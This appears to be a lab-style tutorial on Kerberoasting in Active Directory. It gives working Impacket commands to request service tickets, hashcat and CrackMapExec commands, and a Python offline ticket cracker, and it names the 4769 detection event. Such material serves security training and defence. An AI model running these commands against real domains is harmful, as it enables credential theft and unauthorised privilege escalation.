---
description: It's like roasting marshmallows on a fire... except we're using SPNs instead
---
Kerberoasting is a privilege escalation (and often lateral movement) technique in Active Directory environments.
- It should be highly noted that this attack targets domain accounts that have Service Principal Names (SPNs) registered, i.e. accounts running services
- To perform it we need one of the following:
  - An account's cleartext password or NTLM hash
  - A shell in the context of a domain user
  - SYSTEM level access on a domain-joined host (SYSTEM authenticates to the domain as the machine account, which can request tickets like any other domain principal)
- Domain accounts running services are often local admins on the servers that host the service
- If not, they are typically highly privileged domain accounts
- Always be sure to identify what privileges a service account is granted across multiple servers and hosts in the domain
- Finding SPNs associated with highly privileged accounts in Windows is very common
- Retrieving a Kerberos service ticket (TGS) for an account with an SPN does not by itself allow you to execute commands in the context of that account
- With that said, the encrypted part of the service ticket returned in the TGS-REP is encrypted with a key derived from the service account's password: with RC4-HMAC (etype 23) that key IS the account's NT hash, with AES (etype 17/18) it is a PBKDF2-derived key that is far slower to attack
- This means the ticket can be taken offline and cracked with Hashcat. Any authenticated domain user can ask the KDC for it, the service account is never involved, and the guessing happens entirely on the attacker's machine
-----------------------------------------------------------------------------------------------------
This attack can be performed with the following tools:
- Impacket's GetUserSPNs from a non-domain joined Linux host
- A combination of setspn.exe, PowerShell, and Mimikatz
- From Windows, we can use PowerView, Rubeus, and other PowerShell scripts
Obtaining a TGS ticket from a Kerberoast attack will NOT guarantee you a set of valid credentials: the ticket must still be taken offline and cracked with Hashcat to obtain the cleartext password, and a long random service account password simply will not crack. RC4 TGS tickets also take longer to crack than raw NTLM hashes, because every guess requires deriving the NT hash and then running the RC4-HMAC checksum and decryption instead of a single MD4.
Also, Kerberoasting can be a great way to move laterally or vertically in a domain, but it does not guarantee us any level of access.
- There are times where you can perform the attack, retrieve the TGS tickets, crack them offline, and obtain Domain Admin access or credentials that will aid us on our path there!
-----------------------------------------------------------------------------------------------------
Before we start, we need to make sure that we have the following:
- Valid domain credentials (cleartext or NTLM hash)
- A shell in the context of a domain user, or of an account such as SYSTEM on a domain-joined host
- Successfully identified WHICH host is the Domain Controller so we can query it
{% embed url="https://github.com/SecureAuthCorp/impacket" %} GitHub Repository {% endembed %}
The best way to start this process is to gather a list of SPNs in the domain. To do this, we need a valid set of domain credentials and the IP of the Domain Controller. Depending on how Impacket was installed the script is invoked as `GetUserSPNs.py`, `GetUserSPNs`, or `impacket-GetUserSPNs` (Kali packaging); the arguments are the same.
```bash
# List every account that has an SPN registered (prompts for forend's password)
GetUserSPNs -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend
# Request a service ticket for each of those accounts and print the crackable hashes
GetUserSPNs -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request
# Request only sqldev's ticket and write it to a file for Hashcat
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev -outputfile sqldev_tgs
```
- In this example, we write the TGS ticket for the sqldev user to a file named sqldev_tgs
- We can now crack the ticket offline using Hashcat!
- The Hashcat mode is 13100 (Kerberos 5 TGS-REP, etype 23 / RC4-HMAC). Check the prefix of the line first: `$krb5tgs$23$` is mode 13100, while `$krb5tgs$17$` and `$krb5tgs$18$` mean the account was issued an AES ticket and need modes 19600 and 19700 respectively
```bash
hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt
```
- The cracked password for sqldev is `database!`
- Upon successful cracking of the TGS ticket, we can use CrackMapExec (CME) to test our new creds and validate our authentication (single quotes keep the `!` away from the shell's history expansion)
```bash
sudo crackmapexec smb 172.16.5.5 -u sqldev -p 'database!'
```
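To make concrete what "encrypted with the NT hash" means and what Hashcat is actually doing with mode 13100, here is an added Python example (it is not part of the original page, nor code from Impacket or Hashcat). It builds an RC4-HMAC ticket enc-part the way a KDC would (RFC 4757, key usage 2), formats it in the `$krb5tgs$23$...` line layout GetUserSPNs writes to sqldev_tgs, and then runs the same per-candidate check a cracker performs. The password is the one from the walkthrough; the SPN `MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433`, the confounder and the ticket body are constructed sample data, and MD4 is implemented inline because hashlib's md4 is frequently unavailable.

```python
import hashlib
import hmac
import struct

ETYPE_RC4_HMAC = 23
KEY_USAGE_TGS_REP_TICKET = 2  # RFC 4120 key usage for the ticket enc-part in a TGS-REP
MASK32 = 0xFFFFFFFF


def _md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib.new('md4') is often missing under OpenSSL 3."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = ((f, 0, range(16), (3, 7, 11, 19)),
              (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
              (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)))
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, const, order, shifts in rounds:
            for i, idx in enumerate(order):
                t = (a + fn(b, c, d) + x[idx] + const) & MASK32
                s = shifts[i % 4]
                a, b, c, d = d, ((t << s) | (t >> (32 - s))) & MASK32, b, c  # rotate roles
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); for RC4-HMAC this IS the account's Kerberos key."""
    return _md4(password.encode("utf-16-le"))


def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def _rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation, XORed into the data
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes) -> bytes:
    """RFC 4757 section 5 (what the KDC does): checksum || RC4(K3, confounder || plaintext)."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    checksum = _hmac_md5(k1, confounder + plaintext)  # K2 == K1 for this key usage
    k3 = _hmac_md5(k1, checksum)
    return checksum + _rc4(k3, confounder + plaintext)


def to_hashcat_13100(user: str, realm: str, spn: str, enc_part: bytes) -> str:
    """Line layout GetUserSPNs writes: $krb5tgs$23$*user$realm$spn*$checksum$edata (':' -> '~')."""
    return "$krb5tgs$%d$*%s$%s$%s*$%s$%s" % (ETYPE_RC4_HMAC, user, realm, spn.replace(":", "~"),
                                            enc_part[:16].hex(), enc_part[16:].hex())


def parse_hashcat_13100(line: str):
    head, checksum, edata = line.strip().rsplit("$", 2)
    if not head.startswith("$krb5tgs$23$"):
        raise ValueError("not an RC4-HMAC (etype 23) ticket; AES tickets need modes 19600/19700")
    return bytes.fromhex(checksum), bytes.fromhex(edata)


def check_candidate(line: str, candidate: str) -> bool:
    """One guess, as hashcat -m 13100 does it: NT hash -> K1, K3 from the checksum, decrypt,
    and accept only if the HMAC over the recovered plaintext equals the checksum."""
    checksum, edata = parse_hashcat_13100(line)
    k1 = _hmac_md5(nt_hash(candidate), struct.pack("<I", KEY_USAGE_TGS_REP_TICKET))
    k3 = _hmac_md5(k1, checksum)
    plaintext = _rc4(k3, edata)
    return hmac.compare_digest(_hmac_md5(k1, plaintext), checksum)


def crack(line: str, wordlist):
    """Return the first wordlist entry that decrypts the ticket, or None. Never touches the DC."""
    for candidate in wordlist:
        if check_candidate(line, candidate):
            return candidate
    return None


# Constructed sample: a ticket "issued" under sqldev's password from the walkthrough. The SPN,
# the fixed confounder and the ticket body are made-up stand-ins (a real KDC uses a random
# confounder and the body is the DER-encoded EncTicketPart).
SAMPLE_ENC_PART = rc4_hmac_encrypt(nt_hash("database!"), KEY_USAGE_TGS_REP_TICKET,
                                   b"<constructed EncTicketPart stand-in>", bytes(range(1, 9)))
SAMPLE_LINE = to_hashcat_13100("sqldev", "INLANEFREIGHT.LOCAL",
                               "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433", SAMPLE_ENC_PART)
```

Feed each line of a real sqldev_tgs file to `crack()` and it behaves exactly like the Hashcat run above, just many orders of magnitude slower; the point is that nothing in the check contacts the Domain Controller, so no failed logons are generated and the only trace the defender gets is the original TGS request (event 4769 with encryption type 0x17 on the DC).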